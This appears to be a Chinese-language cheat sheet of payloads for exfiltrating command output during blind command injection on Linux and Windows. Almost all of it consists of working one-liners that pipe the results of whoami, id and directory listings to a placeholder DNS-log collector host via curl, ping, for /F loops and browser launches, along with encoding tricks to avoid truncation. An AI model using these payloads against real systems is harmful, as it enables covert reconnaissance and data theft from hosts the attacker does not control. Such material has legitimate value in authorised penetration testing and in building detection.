摘要
linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(換行符等),就會截斷,隻輸出前面的,這時候可以利用編碼來輸出,但有輸出字元數最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個輸出的指令,直接使用腳本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done; windows:
linux:
curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(換行符等),就會截斷,隻輸出前面的,這時候可以利用編碼來輸出,但有輸出字元數最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個輸出的指令,直接使用腳本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;
windows:
利用HTTP請求: for /F %x in ('whoami') do start http://xxx.dnslog.link/%x 将結果使用預設浏覽器彈出; 利用DNS請求: 擷取計算機名:for /F "delims=/" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 擷取使用者名:for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能編碼輸出,但利用powershell可以實作; dir有/b參數,不顯示修改日期等資訊,隻顯示檔案名,是以可以彈出; for /F %x in ('dir /b C:/') do start http://xxx.dnslog.link/[%x].jpg